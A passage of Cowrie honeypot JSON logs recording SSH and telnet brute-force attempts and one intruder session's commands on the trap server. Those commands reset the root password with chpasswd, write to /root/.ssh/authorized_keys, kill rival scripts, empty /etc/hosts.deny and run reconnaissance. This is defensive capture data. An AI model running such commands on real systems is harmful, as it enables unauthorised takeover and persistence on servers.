~","sensor":"my-vps","timestamp":"2025-08-28T13:53:44.057059Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T13:53:44.267208Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:53:44.268104Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44196,"dst_ip":"1.2.3.4","dst_port":22,"session":"34df10a3725b","protocol":"ssh","message":"New connection: 212.227.235.229:44196 (1.2.3.4:22) [session: 34df10a3725b]","sensor":"my-vps","timestamp":"2025-08-28T13:53:44.472836Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T13:53:44.473804Z","src_ip":"212.227.235.229","session":"34df10a3725b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T13:53:44.680754Z","src_ip":"212.227.235.229","session":"34df10a3725b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T13:53:45.549824Z","src_ip":"212.227.235.229","session":"34df10a3725b"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:53:46.759684Z","src_ip":"212.227.235.229","session":"34df10a3725b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:53:53.370354Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-28T13:53:53.371061Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:53:53.580374Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:53:54.014817Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.command.input","input":"echo \"root:QviIIrSIQcvk\"|chpasswd|bash","message":"CMD: echo \"root:QviIIrSIQcvk\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-08-28T13:53:54.015501Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/85045b6fd943ea9e09a79efd04556bfcceff379067a07fefe90fcb542f606c35","size":21,"shasum":"85045b6fd943ea9e09a79efd04556bfcceff379067a07fefe90fcb542f606c35","duplicate":false,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/85045b6fd943ea9e09a79efd04556bfcceff379067a07fefe90fcb542f606c35 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:53:54.224263Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:53:54.663097Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-08-28T13:53:54.663980Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-08-28T13:53:54.875798Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:53:54.876669Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:53:55.353011Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-08-28T13:53:55.353682Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:53:55.563541Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57262,"dst_ip":"1.2.3.4","dst_port":22,"session":"7afb26fed1f5","protocol":"ssh","message":"New connection: 212.227.125.160:57262 (1.2.3.4:22) [session: 7afb26fed1f5]","sensor":"my-vps","timestamp":"2025-08-28T13:53:55.604606Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:53:55.605477Z","src_ip":"212.227.125.160","session":"7afb26fed1f5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:53:55.769841Z","src_ip":"212.227.125.160","session":"7afb26fed1f5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:53:56.044528Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-08-28T13:53:56.045254Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:53:56.254811Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"1234567","message":"login attempt [deploy/1234567] failed","sensor":"my-vps","timestamp":"2025-08-28T13:53:56.461652Z","src_ip":"212.227.125.160","session":"7afb26fed1f5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:53:57.093045Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-08-28T13:53:57.093707Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-08-28T13:53:57.094168Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:53:57.303800Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:53:57.625035Z","src_ip":"212.227.125.160","session":"7afb26fed1f5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:53:57.737765Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-08-28T13:53:57.738503Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:53:57.947357Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:53:58.424830Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-08-28T13:53:58.425531Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":205,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:53:58.634335Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:53:59.113909Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-08-28T13:53:59.114620Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:53:59.323839Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:53:59.801508Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-28T13:53:59.802294Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:54:00.012027Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:54:00.493293Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-08-28T13:54:00.494164Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:54:00.703935Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:54:01.612524Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-08-28T13:54:01.613423Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:54:01.823256Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:54:02.259871Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T13:54:02.260590Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:54:02.469920Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:54:02.946465Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-28T13:54:02.947160Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:54:03.156322Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:54:03.635585Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-08-28T13:54:03.636250Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:54:03.845481Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:54:04.321267Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-08-28T13:54:04.321961Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:54:04.531920Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.session.closed","duration":"22.7","message":"Connection lost after 22.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:54:04.533345Z","src_ip":"212.227.235.229","session":"fefe3a9279ad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44545,"dst_ip":"1.2.3.4","dst_port":23,"session":"f69af0b59ade","protocol":"telnet","message":"New connection: 212.227.235.229:44545 (1.2.3.4:23) [session: f69af0b59ade]","sensor":"my-vps","timestamp":"2025-08-28T13:54:13.542575Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52038,"dst_ip":"1.2.3.4","dst_port":22,"session":"89b95b5d794a","protocol":"ssh","message":"New connection: 212.227.125.160:52038 (1.2.3.4:22) [session: 89b95b5d794a]","sensor":"my-vps","timestamp":"2025-08-28T13:54:29.436548Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:54:29.437529Z","src_ip":"212.227.125.160","session":"89b95b5d794a"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:54:29.605876Z","src_ip":"212.227.125.160","session":"89b95b5d794a"}
{"eventid":"cowrie.login.failed","username":"ec2-user","password":"123456","message":"login attempt [ec2-user/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T13:54:30.102876Z","src_ip":"212.227.125.160","session":"89b95b5d794a"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:54:31.269300Z","src_ip":"212.227.125.160","session":"89b95b5d794a"}
{"eventid":"cowrie.session.closed","duration":30.805182695388794,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:54:44.347678Z","src_ip":"212.227.235.229","session":"f69af0b59ade"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36492,"dst_ip":"1.2.3.4","dst_port":22,"session":"1c7fb9d77bd4","protocol":"ssh","message":"New connection: 212.227.125.160:36492 (1.2.3.4:22) [session: 1c7fb9d77bd4]","sensor":"my-vps","timestamp":"2025-08-28T13:55:05.568614Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:55:05.569564Z","src_ip":"212.227.125.160","session":"1c7fb9d77bd4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-